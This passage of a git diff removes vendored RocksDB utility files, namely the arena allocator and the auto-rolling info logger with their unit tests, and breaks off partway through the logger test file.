-  size_t blocks_memory_ = 0;
-  AllocTracker* tracker_;
-};
-
-inline char* Arena::Allocate(size_t bytes) {
-  // The semantics of what to return are a bit messy if we allow
-  // 0-byte allocations, so we disallow them here (we don't need
-  // them for our internal use).
-  assert(bytes > 0);
-  if (bytes <= alloc_bytes_remaining_) {
-    unaligned_alloc_ptr_ -= bytes;
-    alloc_bytes_remaining_ -= bytes;
-    return unaligned_alloc_ptr_;
-  }
-  return AllocateFallback(bytes, false /* unaligned */);
-}
-
-// check and adjust the block_size so that the return value is
-//  1. in the range of [kMinBlockSize, kMaxBlockSize].
-//  2. the multiple of align unit.
-extern size_t OptimizeBlockSize(size_t block_size);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/arena_test.cc b/thirdparty/rocksdb/util/arena_test.cc
deleted file mode 100644
index 53777a2..0000000
--- a/thirdparty/rocksdb/util/arena_test.cc
+++ /dev/null
@@ -1,203 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/arena.h"
-#include "util/random.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-namespace {
-const size_t kHugePageSize = 2 * 1024 * 1024;
-}  // namespace
-class ArenaTest : public testing::Test {};
-
-TEST_F(ArenaTest, Empty) { Arena arena0; }
-
-namespace {
-bool CheckMemoryAllocated(size_t allocated, size_t expected) {
-  // The value returned by Arena::MemoryAllocatedBytes() may be greater than
-  // the requested memory. We choose a somewhat arbitrary upper bound of
-  // max_expected = expected * 1.1 to detect critical overallocation.
-  size_t max_expected = expected + expected / 10;
-  return allocated >= expected && allocated <= max_expected;
-}
-
-void MemoryAllocatedBytesTest(size_t huge_page_size) {
-  const int N = 17;
-  size_t req_sz;  // requested size
-  size_t bsz = 32 * 1024;  // block size
-  size_t expected_memory_allocated;
-
-  Arena arena(bsz, nullptr, huge_page_size);
-
-  // requested size > quarter of a block:
-  //   allocate requested size separately
-  req_sz = 12 * 1024;
-  for (int i = 0; i < N; i++) {
-    arena.Allocate(req_sz);
-  }
-  expected_memory_allocated = req_sz * N + Arena::kInlineSize;
-  ASSERT_PRED2(CheckMemoryAllocated, arena.MemoryAllocatedBytes(),
-               expected_memory_allocated);
-
-  arena.Allocate(Arena::kInlineSize - 1);
-
-  // requested size < quarter of a block:
-  //   allocate a block with the default size, then try to use unused part
-  //   of the block. So one new block will be allocated for the first
-  //   Allocate(99) call. All the remaining calls won't lead to new allocation.
-  req_sz = 99;
-  for (int i = 0; i < N; i++) {
-    arena.Allocate(req_sz);
-  }
-  if (huge_page_size) {
-    ASSERT_TRUE(
-        CheckMemoryAllocated(arena.MemoryAllocatedBytes(),
-                             expected_memory_allocated + bsz) ||
-        CheckMemoryAllocated(arena.MemoryAllocatedBytes(),
-                             expected_memory_allocated + huge_page_size));
-  } else {
-    expected_memory_allocated += bsz;
-    ASSERT_PRED2(CheckMemoryAllocated, arena.MemoryAllocatedBytes(),
-                 expected_memory_allocated);
-  }
-
-  // requested size > size of a block:
-  //   allocate requested size separately
-  expected_memory_allocated = arena.MemoryAllocatedBytes();
-  req_sz = 8 * 1024 * 1024;
-  for (int i = 0; i < N; i++) {
-    arena.Allocate(req_sz);
-  }
-  expected_memory_allocated += req_sz * N;
-  ASSERT_PRED2(CheckMemoryAllocated, arena.MemoryAllocatedBytes(),
-               expected_memory_allocated);
-}
-
-// Make sure we didn't count the allocate but not used memory space in
-// Arena::ApproximateMemoryUsage()
-static void ApproximateMemoryUsageTest(size_t huge_page_size) {
-  const size_t kBlockSize = 4096;
-  const size_t kEntrySize = kBlockSize / 8;
-  const size_t kZero = 0;
-  Arena arena(kBlockSize, nullptr, huge_page_size);
-  ASSERT_EQ(kZero, arena.ApproximateMemoryUsage());
-
-  // allocate inline bytes
-  EXPECT_TRUE(arena.IsInInlineBlock());
-  arena.AllocateAligned(8);
-  EXPECT_TRUE(arena.IsInInlineBlock());
-  arena.AllocateAligned(Arena::kInlineSize / 2 - 16);
-  EXPECT_TRUE(arena.IsInInlineBlock());
-  arena.AllocateAligned(Arena::kInlineSize / 2);
-  EXPECT_TRUE(arena.IsInInlineBlock());
-  ASSERT_EQ(arena.ApproximateMemoryUsage(), Arena::kInlineSize - 8);
-  ASSERT_PRED2(CheckMemoryAllocated, arena.MemoryAllocatedBytes(),
-               Arena::kInlineSize);
-
-  auto num_blocks = kBlockSize / kEntrySize;
-
-  // first allocation
-  arena.AllocateAligned(kEntrySize);
-  EXPECT_FALSE(arena.IsInInlineBlock());
-  auto mem_usage = arena.MemoryAllocatedBytes();
-  if (huge_page_size) {
-    ASSERT_TRUE(
-        CheckMemoryAllocated(mem_usage, kBlockSize + Arena::kInlineSize) ||
-        CheckMemoryAllocated(mem_usage, huge_page_size + Arena::kInlineSize));
-  } else {
-    ASSERT_PRED2(CheckMemoryAllocated, mem_usage,
-                 kBlockSize + Arena::kInlineSize);
-  }
-  auto usage = arena.ApproximateMemoryUsage();
-  ASSERT_LT(usage, mem_usage);
-  for (size_t i = 1; i < num_blocks; ++i) {
-    arena.AllocateAligned(kEntrySize);
-    ASSERT_EQ(mem_usage, arena.MemoryAllocatedBytes());
-    ASSERT_EQ(arena.ApproximateMemoryUsage(), usage + kEntrySize);
-    EXPECT_FALSE(arena.IsInInlineBlock());
-    usage = arena.ApproximateMemoryUsage();
-  }
-  if (huge_page_size) {
-    ASSERT_TRUE(usage > mem_usage ||
-                usage + huge_page_size - kBlockSize == mem_usage);
-  } else {
-    ASSERT_GT(usage, mem_usage);
-  }
-}
-
-static void SimpleTest(size_t huge_page_size) {
-  std::vector<std::pair<size_t, char*>> allocated;
-  Arena arena(Arena::kMinBlockSize, nullptr, huge_page_size);
-  const int N = 100000;
-  size_t bytes = 0;
-  Random rnd(301);
-  for (int i = 0; i < N; i++) {
-    size_t s;
-    if (i % (N / 10) == 0) {
-      s = i;
-    } else {
-      s = rnd.OneIn(4000)
-              ? rnd.Uniform(6000)
-              : (rnd.OneIn(10) ? rnd.Uniform(100) : rnd.Uniform(20));
-    }
-    if (s == 0) {
-      // Our arena disallows size 0 allocations.
-      s = 1;
-    }
-    char* r;
-    if (rnd.OneIn(10)) {
-      r = arena.AllocateAligned(s);
-    } else {
-      r = arena.Allocate(s);
-    }
-
-    for (unsigned int b = 0; b < s; b++) {
-      // Fill the "i"th allocation with a known bit pattern
-      r[b] = i % 256;
-    }
-    bytes += s;
-    allocated.push_back(std::make_pair(s, r));
-    ASSERT_GE(arena.ApproximateMemoryUsage(), bytes);
-    if (i > N / 10) {
-      ASSERT_LE(arena.ApproximateMemoryUsage(), bytes * 1.10);
-    }
-  }
-  for (unsigned int i = 0; i < allocated.size(); i++) {
-    size_t num_bytes = allocated[i].first;
-    const char* p = allocated[i].second;
-    for (unsigned int b = 0; b < num_bytes; b++) {
-      // Check the "i"th allocation for the known bit pattern
-      ASSERT_EQ(int(p[b]) & 0xff, (int)(i % 256));
-    }
-  }
-}
-}  // namespace
-
-TEST_F(ArenaTest, MemoryAllocatedBytes) {
-  MemoryAllocatedBytesTest(0);
-  MemoryAllocatedBytesTest(kHugePageSize);
-}
-
-TEST_F(ArenaTest, ApproximateMemoryUsage) {
-  ApproximateMemoryUsageTest(0);
-  ApproximateMemoryUsageTest(kHugePageSize);
-}
-
-TEST_F(ArenaTest, Simple) {
-  SimpleTest(0);
-  SimpleTest(kHugePageSize);
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/auto_roll_logger.cc b/thirdparty/rocksdb/util/auto_roll_logger.cc
deleted file mode 100644
index ae6061a..0000000
--- a/thirdparty/rocksdb/util/auto_roll_logger.cc
+++ /dev/null
@@ -1,177 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "util/auto_roll_logger.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-// -- AutoRollLogger
-Status AutoRollLogger::ResetLogger() {
-  TEST_SYNC_POINT("AutoRollLogger::ResetLogger:BeforeNewLogger");
-  status_ = env_->NewLogger(log_fname_, &logger_);
-  TEST_SYNC_POINT("AutoRollLogger::ResetLogger:AfterNewLogger");
-
-  if (!status_.ok()) {
-    return status_;
-  }
-
-  if (logger_->GetLogFileSize() == Logger::kDoNotSupportGetLogFileSize) {
-    status_ = Status::NotSupported(
-        "The underlying logger doesn't support GetLogFileSize()");
-  }
-  if (status_.ok()) {
-    cached_now = static_cast<uint64_t>(env_->NowMicros() * 1e-6);
-    ctime_ = cached_now;
-    cached_now_access_count = 0;
-  }
-
-  return status_;
-}
-
-void AutoRollLogger::RollLogFile() {
-  // This function is called when log is rotating. Two rotations
-  // can happen quickly (NowMicro returns same value). To not overwrite
-  // previous log file we increment by one micro second and try again.
-  uint64_t now = env_->NowMicros();
-  std::string old_fname;
-  do {
-    old_fname = OldInfoLogFileName(
-      dbname_, now, db_absolute_path_, db_log_dir_);
-    now++;
-  } while (env_->FileExists(old_fname).ok());
-  env_->RenameFile(log_fname_, old_fname);
-}
-
-std::string AutoRollLogger::ValistToString(const char* format,
-                                           va_list args) const {
-  // Any log messages longer than 1024 will get truncated.
-  // The user is responsible for chopping longer messages into multi line log
-  static const int MAXBUFFERSIZE = 1024;
-  char buffer[MAXBUFFERSIZE];
-
-  int count = vsnprintf(buffer, MAXBUFFERSIZE, format, args);
-  (void) count;
-  assert(count >= 0);
-
-  return buffer;
-}
-
-void AutoRollLogger::LogInternal(const char* format, ...) {
-  mutex_.AssertHeld();
-  va_list args;
-  va_start(args, format);
-  logger_->Logv(format, args);
-  va_end(args);
-}
-
-void AutoRollLogger::Logv(const char* format, va_list ap) {
-  assert(GetStatus().ok());
-
-  std::shared_ptr<Logger> logger;
-  {
-    MutexLock l(&mutex_);
-    if ((kLogFileTimeToRoll > 0 && LogExpired()) ||
-        (kMaxLogFileSize > 0 && logger_->GetLogFileSize() >= kMaxLogFileSize)) {
-      RollLogFile();
-      Status s = ResetLogger();
-      if (!s.ok()) {
-        // can't really log the error if creating a new LOG file failed
-        return;
-      }
-
-      WriteHeaderInfo();
-    }
-
-    // pin down the current logger_ instance before releasing the mutex.
-    logger = logger_;
-  }
-
-  // Another thread could have put a new Logger instance into logger_ by now.
-  // However, since logger is still hanging on to the previous instance
-  // (reference count is not zero), we don't have to worry about it being
-  // deleted while we are accessing it.
-  // Note that logv itself is not mutex protected to allow maximum concurrency,
-  // as thread safety should have been handled by the underlying logger.
-  logger->Logv(format, ap);
-}
-
-void AutoRollLogger::WriteHeaderInfo() {
-  mutex_.AssertHeld();
-  for (auto& header : headers_) {
-    LogInternal("%s", header.c_str());
-  }
-}
-
-void AutoRollLogger::LogHeader(const char* format, va_list args) {
-  // header message are to be retained in memory. Since we cannot make any
-  // assumptions about the data contained in va_list, we will retain them as
-  // strings
-  va_list tmp;
-  va_copy(tmp, args);
-  std::string data = ValistToString(format, tmp);
-  va_end(tmp);
-
-  MutexLock l(&mutex_);
-  headers_.push_back(data);
-
-  // Log the original message to the current log
-  logger_->Logv(format, args);
-}
-
-bool AutoRollLogger::LogExpired() {
-  if (cached_now_access_count >= call_NowMicros_every_N_records_) {
-    cached_now = static_cast<uint64_t>(env_->NowMicros() * 1e-6);
-    cached_now_access_count = 0;
-  }
-
-  ++cached_now_access_count;
-  return cached_now >= ctime_ + kLogFileTimeToRoll;
-}
-#endif  // !ROCKSDB_LITE
-
-Status CreateLoggerFromOptions(const std::string& dbname,
-                               const DBOptions& options,
-                               std::shared_ptr<Logger>* logger) {
-  if (options.info_log) {
-    *logger = options.info_log;
-    return Status::OK();
-  }
-
-  Env* env = options.env;
-  std::string db_absolute_path;
-  env->GetAbsolutePath(dbname, &db_absolute_path);
-  std::string fname =
-      InfoLogFileName(dbname, db_absolute_path, options.db_log_dir);
-
-  env->CreateDirIfMissing(dbname);  // In case it does not exist
-  // Currently we only support roll by time-to-roll and log size
-#ifndef ROCKSDB_LITE
-  if (options.log_file_time_to_roll > 0 || options.max_log_file_size > 0) {
-    AutoRollLogger* result = new AutoRollLogger(
-        env, dbname, options.db_log_dir, options.max_log_file_size,
-        options.log_file_time_to_roll, options.info_log_level);
-    Status s = result->GetStatus();
-    if (!s.ok()) {
-      delete result;
-    } else {
-      logger->reset(result);
-    }
-    return s;
-  }
-#endif  // !ROCKSDB_LITE
-  // Open a log file in the same directory as the db
-  env->RenameFile(fname,
-                  OldInfoLogFileName(dbname, env->NowMicros(), db_absolute_path,
-                                     options.db_log_dir));
-  auto s = env->NewLogger(fname, logger);
-  if (logger->get() != nullptr) {
-    (*logger)->SetInfoLogLevel(options.info_log_level);
-  }
-  return s;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/auto_roll_logger.h b/thirdparty/rocksdb/util/auto_roll_logger.h
deleted file mode 100644
index 2f1f943..0000000
--- a/thirdparty/rocksdb/util/auto_roll_logger.h
+++ /dev/null
@@ -1,133 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Logger implementation that can be shared by all environments
-// where enough posix functionality is available.
-
-#pragma once
-#include <list>
-#include <string>
-
-#include "port/port.h"
-#include "port/util_logger.h"
-#include "util/filename.h"
-#include "util/mutexlock.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-// Rolls the log file by size and/or time
-class AutoRollLogger : public Logger {
- public:
-  AutoRollLogger(Env* env, const std::string& dbname,
-                 const std::string& db_log_dir, size_t log_max_size,
-                 size_t log_file_time_to_roll,
-                 const InfoLogLevel log_level = InfoLogLevel::INFO_LEVEL)
-      : Logger(log_level),
-        dbname_(dbname),
-        db_log_dir_(db_log_dir),
-        env_(env),
-        status_(Status::OK()),
-        kMaxLogFileSize(log_max_size),
-        kLogFileTimeToRoll(log_file_time_to_roll),
-        cached_now(static_cast<uint64_t>(env_->NowMicros() * 1e-6)),
-        ctime_(cached_now),
-        cached_now_access_count(0),
-        call_NowMicros_every_N_records_(100),
-        mutex_() {
-    env->GetAbsolutePath(dbname, &db_absolute_path_);
-    log_fname_ = InfoLogFileName(dbname_, db_absolute_path_, db_log_dir_);
-    RollLogFile();
-    ResetLogger();
-  }
-
-  using Logger::Logv;
-  void Logv(const char* format, va_list ap) override;
-
-  // Write a header entry to the log. All header information will be written
-  // again every time the log rolls over.
-  virtual void LogHeader(const char* format, va_list ap) override;
-
-  // check if the logger has encountered any problem.
-  Status GetStatus() {
-    return status_;
-  }
-
-  size_t GetLogFileSize() const override {
-    std::shared_ptr<Logger> logger;
-    {
-      MutexLock l(&mutex_);
-      // pin down the current logger_ instance before releasing the mutex.
-      logger = logger_;
-    }
-    return logger->GetLogFileSize();
-  }
-
-  void Flush() override {
-    std::shared_ptr<Logger> logger;
-    {
-      MutexLock l(&mutex_);
-      // pin down the current logger_ instance before releasing the mutex.
-      logger = logger_;
-    }
-    TEST_SYNC_POINT("AutoRollLogger::Flush:PinnedLogger");
-    if (logger) {
-      logger->Flush();
-    }
-  }
-
-  virtual ~AutoRollLogger() {
-  }
-
-  void SetCallNowMicrosEveryNRecords(uint64_t call_NowMicros_every_N_records) {
-    call_NowMicros_every_N_records_ = call_NowMicros_every_N_records;
-  }
-
-  // Expose the log file path for testing purpose
-  std::string TEST_log_fname() const {
-    return log_fname_;
-  }
-
-  uint64_t TEST_ctime() const { return ctime_; }
-
- private:
-  bool LogExpired();
-  Status ResetLogger();
-  void RollLogFile();
-  // Log message to logger without rolling
-  void LogInternal(const char* format, ...);
-  // Serialize the va_list to a string
-  std::string ValistToString(const char* format, va_list args) const;
-  // Write the logs marked as headers to the new log file
-  void WriteHeaderInfo();
-
-  std::string log_fname_; // Current active info log's file name.
-  std::string dbname_;
-  std::string db_log_dir_;
-  std::string db_absolute_path_;
-  Env* env_;
-  std::shared_ptr<Logger> logger_;
-  // current status of the logger
-  Status status_;
-  const size_t kMaxLogFileSize;
-  const size_t kLogFileTimeToRoll;
-  // header information
-  std::list<std::string> headers_;
-  // to avoid frequent env->NowMicros() calls, we cached the current time
-  uint64_t cached_now;
-  uint64_t ctime_;
-  uint64_t cached_now_access_count;
-  uint64_t call_NowMicros_every_N_records_;
-  mutable port::Mutex mutex_;
-};
-#endif  // !ROCKSDB_LITE
-
-// Facade to craete logger automatically
-Status CreateLoggerFromOptions(const std::string& dbname,
-                               const DBOptions& options,
-                               std::shared_ptr<Logger>* logger);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/auto_roll_logger_test.cc b/thirdparty/rocksdb/util/auto_roll_logger_test.cc
deleted file mode 100644
index 9b39748..0000000
--- a/thirdparty/rocksdb/util/auto_roll_logger_test.cc
+++ /dev/null
@@ -1,490 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-
-#include "util/auto_roll_logger.h"
-#include <errno.h>
-#include <sys/stat.h>
-#include <algorithm>
-#include <cmath>
-#include <fstream>
-#include <iostream>
-#include <iterator>
-#include <string>
-#include <thread>
-#include <vector>
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "util/logging.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-namespace {
-class NoSleepEnv : public EnvWrapper {
- public:
-  NoSleepEnv(Env* base) : EnvWrapper(base) {}
-  virtual void SleepForMicroseconds(int micros) override {
-    fake_time_ += static_cast<uint64_t>(micros);
-  }
-
-  virtual uint64_t NowNanos() override { return fake_time_ * 1000; }
-
-  virtual uint64_t NowMicros() override { return fake_time_; }
-
- private:
-  uint64_t fake_time_ = 6666666666;
-};
-}  // namespace
-
-class AutoRollLoggerTest : public testing::Test {
- public:
-  static void InitTestDb() {
-#ifdef OS_WIN
-    // Replace all slashes in the path so windows CompSpec does not
-    // become confused
-    std::string testDir(kTestDir);
-    std::replace_if(testDir.begin(), testDir.end(),
-                    [](char ch) { return ch == '/'; }, '\\');
-    std::string deleteCmd = "if exist " + testDir + " rd /s /q " + testDir;
-#else
-    std::string deleteCmd = "rm -rf " + kTestDir;
-#endif
-    ASSERT_TRUE(system(deleteCmd.c_str()) == 0);
-    Env::Default()->CreateDir(kTestDir);
-  }
-
-  void RollLogFileBySizeTest(AutoRollLogger* logger, size_t log_max_size,
-                             const std::string& log_message);
-  void RollLogFileByTimeTest(Env*, AutoRollLogger* logger, size_t time,
-                             const std::string& log_message);
-
-  static const std::string kSampleMessage;
-  static const std::string kTestDir;
-  static const std::string kLogFile;
-  static Env* default_env;
-};
-
-const std::string AutoRollLoggerTest::kSampleMessage(
-    "this is the message to be written to the log file!!");
-const std::string AutoRollLoggerTest::kTestDir(test::TmpDir() + "/db_log_test");
-const std::string AutoRollLoggerTest::kLogFile(test::TmpDir() +
-                                               "/db_log_test/LOG");
-Env* AutoRollLoggerTest::default_env = Env::Default();
-
-// In this test we only want to Log some simple log message with
-// no format. LogMessage() provides such a simple interface and
-// avoids the [format-security] warning which occurs when you
-// call ROCKS_LOG_INFO(logger, log_message) directly.
-namespace {
-void LogMessage(Logger* logger, const char* message) {
-  ROCKS_LOG_INFO(logger, "%s", message);
-}
-
-void LogMessage(const InfoLogLevel log_level, Logger* logger,
-                const char* message) {
-  Log(log_level, logger, "%s", message);
-}
-}  // namespace
-
-void AutoRollLoggerTest::RollLogFileBySizeTest(AutoRollLogger* logger,
-                                               size_t log_max_size,
-                                               const std::string& log_message) {
-  logger->SetInfoLogLevel(InfoLogLevel::INFO_LEVEL);
-  // measure the size of each message, which is supposed
-  // to be equal or greater than log_message.size()
-  LogMessage(logger, log_message.c_str());
-  size_t message_size = logger->GetLogFileSize();
-  size_t current_log_size = message_size;
-
-  // Test the cases when the log file will not be rolled.
-  while (current_log_size + message_size < log_max_size) {
-    LogMessage(logger, log_message.c_str());
-    current_log_size += message_size;
-    ASSERT_EQ(current_log_size, logger->GetLogFileSize());
-  }
-
-  // Now the log file will be rolled
-  LogMessage(logger, log_message.c_str());
-  // Since rotation is checked before actual logging, we need to
-  // trigger the rotation by logging another message.
-  LogMessage(logger, log_message.c_str());
-
-  ASSERT_TRUE(message_size == logger->GetLogFileSize());
-}
-
-void AutoRollLoggerTest::RollLogFileByTimeTest(Env* env, AutoRollLogger* logger,
-                                               size_t time,
-                                               const std::string& log_message) {
-  uint64_t expected_ctime;
-  uint64_t actual_ctime;
-
-  uint64_t total_log_size;
-  EXPECT_OK(env->GetFileSize(kLogFile, &total_log_size));
-  expected_ctime = logger->TEST_ctime();
-  logger->SetCallNowMicrosEveryNRecords(0);
-
-  // -- Write to the log for several times, which is supposed
-  // to be finished before time.
-  for (int i = 0; i < 10; ++i) {
-    env->SleepForMicroseconds(50000);
-    LogMessage(logger, log_message.c_str());
-    EXPECT_OK(logger->GetStatus());
-    // Make sure we always write to the same log file (by
-    // checking the create time);
-
-    actual_ctime = logger->TEST_ctime();
-
-    // Also make sure the log size is increasing.
-    EXPECT_EQ(expected_ctime, actual_ctime);
-    EXPECT_GT(logger->GetLogFileSize(), total_log_size);
-    total_log_size = logger->GetLogFileSize();
-  }
-
-  // -- Make the log file expire
-  env->SleepForMicroseconds(static_cast<int>(time * 1000000));
-  LogMessage(logger, log_message.c_str());
-
-  // At this time, the new log file should be created.
-  actual_ctime = logger->TEST_ctime();
-  EXPECT_LT(expected_ctime, actual_ctime);
-  EXPECT_LT(logger->GetLogFileSize(), total_log_size);
-}
-
-TEST_F(AutoRollLoggerTest, RollLogFileBySize) {
-    InitTestDb();
-    size_t log_max_size = 1024 * 5;
-
-    AutoRollLogger logger(Env::Default(), kTestDir, "", log_max_size, 0);
-
-    RollLogFileBySizeTest(&logger, log_max_size,
-                          kSampleMessage + ":RollLogFileBySize");
-}
-
-TEST_F(AutoRollLoggerTest, RollLogFileByTime) {
-  NoSleepEnv nse(Env::Default());
-
-  size_t time = 2;
-  size_t log_size = 1024 * 5;
-
-  InitTestDb();
-  // -- Test the existence of file during the server restart.
-  ASSERT_EQ(Status::NotFound(), default_env->FileExists(kLogFile));
-  AutoRollLogger logger(&nse, kTestDir, "", log_size, time);
-  ASSERT_OK(default_env->FileExists(kLogFile));
-
-  RollLogFileByTimeTest(&nse, &logger, time,
-                        kSampleMessage + ":RollLogFileByTime");
-}
-
-TEST_F(AutoRollLoggerTest, OpenLogFilesMultipleTimesWithOptionLog_max_size) {
-  // If only 'log_max_size' options is specified, then every time
-  // when rocksdb is restarted, a new empty log file will be created.
-  InitTestDb();
-  // WORKAROUND:
-  // avoid complier's complaint of "comparison between signed
-  // and unsigned integer expressions" because literal 0 is
-  // treated as "singed".
-  size_t kZero = 0;
-  size_t log_size = 1024;
-
-  AutoRollLogger* logger = new AutoRollLogger(
-    Env::Default(), kTestDir, "", log_size, 0);
-
-  LogMessage(logger, kSampleMessage.c_str());
-  ASSERT_GT(logger->GetLogFileSize(), kZero);
-  delete logger;
-
-  // reopens the log file and an empty log file will be created.
-  logger = new AutoRollLogger(
-    Env::Default(), kTestDir, "", log_size, 0);
-  ASSERT_EQ(logger->GetLogFileSize(), kZero);
-  delete logger;
-}
-
-TEST_F(AutoRollLoggerTest, CompositeRollByTimeAndSizeLogger) {
-  size_t time = 2, log_max_size = 1024 * 5;
-
-  InitTestDb();
-
-  NoSleepEnv nse(Env::Default());
-  AutoRollLogger logger(&nse, kTestDir, "", log_max_size, time);
-
-  // Test the ability to roll by size
-  RollLogFileBySizeTest(&logger, log_max_size,
-                        kSampleMessage + ":CompositeRollByTimeAndSizeLogger");
-
-  // Test the ability to roll by Time
-  RollLogFileByTimeTest(&nse, &logger, time,
-                        kSampleMessage + ":CompositeRollByTimeAndSizeLogger");
-}
-
-#ifndef OS_WIN
-// TODO: does not build for Windows because of PosixLogger use below. Need to
-// port
-TEST_F(AutoRollLoggerTest, CreateLoggerFromOptions) {
-  DBOptions options;
-  NoSleepEnv nse(Env::Default());
-  shared_ptr<Logger> logger;
-
-  // Normal logger
-  ASSERT_OK(CreateLoggerFromOptions(kTestDir, options, &logger));
-  ASSERT_TRUE(dynamic_cast<PosixLogger*>(logger.get()));
-
-  // Only roll by size
-  InitTestDb();
-  options.max_log_file_size = 1024;
-  ASSERT_OK(CreateLoggerFromOptions(kTestDir, options, &logger));
-  AutoRollLogger* auto_roll_logger =
-    dynamic_cast<AutoRollLogger*>(logger.get());
-  ASSERT_TRUE(auto_roll_logger);
-  RollLogFileBySizeTest(
-      auto_roll_logger, options.max_log_file_size,
-      kSampleMessage + ":CreateLoggerFromOptions - size");
-
-  // Only roll by Time
-  options.env = &nse;
-  InitTestDb();
-  options.max_log_file_size = 0;
-  options.log_file_time_to_roll = 2;
-  ASSERT_OK(CreateLoggerFromOptions(kTestDir, options, &logger));
-  auto_roll_logger =
-    dynamic_cast<AutoRollLogger*>(logger.get());
-  RollLogFileByTimeTest(&nse, auto_roll_logger, options.log_file_time_to_roll,
-                        kSampleMessage + ":CreateLoggerFromOptions - time");
-
-  // roll by both Time and size
-  InitTestDb();
-  options.max_log_file_size = 1024 * 5;
-  options.log_file_time_to_roll = 2;
-  ASSERT_OK(CreateLoggerFromOptions(kTestDir, options, &logger));
-  auto_roll_logger =
-    dynamic_cast<AutoRollLogger*>(logger.get());
-  RollLogFileBySizeTest(auto_roll_logger, options.max_log_file_size,
-                        kSampleMessage + ":CreateLoggerFromOptions - both");
-  RollLogFileByTimeTest(&nse, auto_roll_logger, options.log_file_time_to_roll,
-                        kSampleMessage + ":CreateLoggerFromOptions - both");
-}
-
-TEST_F(AutoRollLoggerTest, LogFlushWhileRolling) {
-  DBOptions options;
-  shared_ptr<Logger> logger;
-
-  InitTestDb();
-  options.max_log_file_size = 1024 * 5;
-  ASSERT_OK(CreateLoggerFromOptions(kTestDir, options, &logger));
-  AutoRollLogger* auto_roll_logger =
-      dynamic_cast<AutoRollLogger*>(logger.get());
-  ASSERT_TRUE(auto_roll_logger);
-  rocksdb::port::Thread flush_thread;
-
-  // Notes:
-  // (1) Need to pin the old logger before beginning the roll, as rolling grabs
-  //     the mutex, which would prevent us from accessing the old logger. This
-  //     also marks flush_thread with AutoRollLogger::Flush:PinnedLogger.
-  // (2) Need to reset logger during PosixLogger::Flush() to exercise a race
-  //     condition case, which is executing the flush with the pinned (old)
-  //     logger after auto-roll logger has cut over to a new logger.
-  // (3) PosixLogger::Flush() happens in both threads but its SyncPoints only
-  //     are enabled in flush_thread (the one pinning the old logger).
-  rocksdb::SyncPoint::GetInstance()->LoadDependencyAndMarkers(
-      {{"AutoRollLogger::Flush:PinnedLogger",
-        "AutoRollLoggerTest::LogFlushWhileRolling:PreRollAndPostThreadInit"},
-       {"PosixLogger::Flush:Begin1",
-        "AutoRollLogger::ResetLogger:BeforeNewLogger"},
-       {"AutoRollLogger::ResetLogger:AfterNewLogger",
-        "PosixLogger::Flush:Begin2"}},
-      {{"AutoRollLogger::Flush:PinnedLogger", "PosixLogger::Flush:Begin1"},
-       {"AutoRollLogger::Flush:PinnedLogger", "PosixLogger::Flush:Begin2"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  flush_thread = port::Thread ([&]() { auto_roll_logger->Flush(); });
-  TEST_SYNC_POINT(
-      "AutoRollLoggerTest::LogFlushWhileRolling:PreRollAndPostThreadInit");
-  RollLogFileBySizeTest(auto_roll_logger, options.max_log_file_size,
-                        kSampleMessage + ":LogFlushWhileRolling");
-  flush_thread.join();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-#endif  // OS_WIN
-
-TEST_F(AutoRollLoggerTest, InfoLogLevel) {
-  InitTestDb();
-
-  size_t log_size = 8192;
-  size_t log_lines = 0;
-  // an extra-scope to force the AutoRollLogger to flush the log file when it
-  // becomes out of scope.
-  {
-    AutoRollLogger logger(Env::Default(), kTestDir, "", log_size, 0);
-    for (int log_level = InfoLogLevel::HEADER_LEVEL;
-         log_level >= InfoLogLevel::DEBUG_LEVEL; log_level--) {
-      logger.SetInfoLogLevel((InfoLogLevel)log_level);
-      for (int log_type = InfoLogLevel::DEBUG_LEVEL;
-           log_type <= InfoLogLevel::HEADER_LEVEL; log_type++) {
-        // log messages with log level smaller than log_level will not be
-        // logged.
-        LogMessage((InfoLogLevel)log_type, &logger, kSampleMessage.c_str());
-      }
-      log_lines += InfoLogLevel::HEADER_LEVEL - log_level + 1;
-    }
-    for (int log_level = InfoLogLevel::HEADER_LEVEL;
-         log_level >= InfoLogLevel::DEBUG_LEVEL; log_level--) {
-      logger.SetInfoLogLevel((InfoLogLevel)log_level);
-
-      // again, messages with level smaller than log_level will not be logged.
-      ROCKS_LOG_HEADER(&logger, "%s", kSampleMessage.c_str());
-      ROCKS_LOG_DEBUG(&logger, "%s", kSampleMessage.c_str());
-      ROCKS_LOG_INFO(&logger, "%s", kSampleMessage.c_str());
-      ROCKS_LOG_WARN(&logger, "%s", kSampleMessage.c_str());
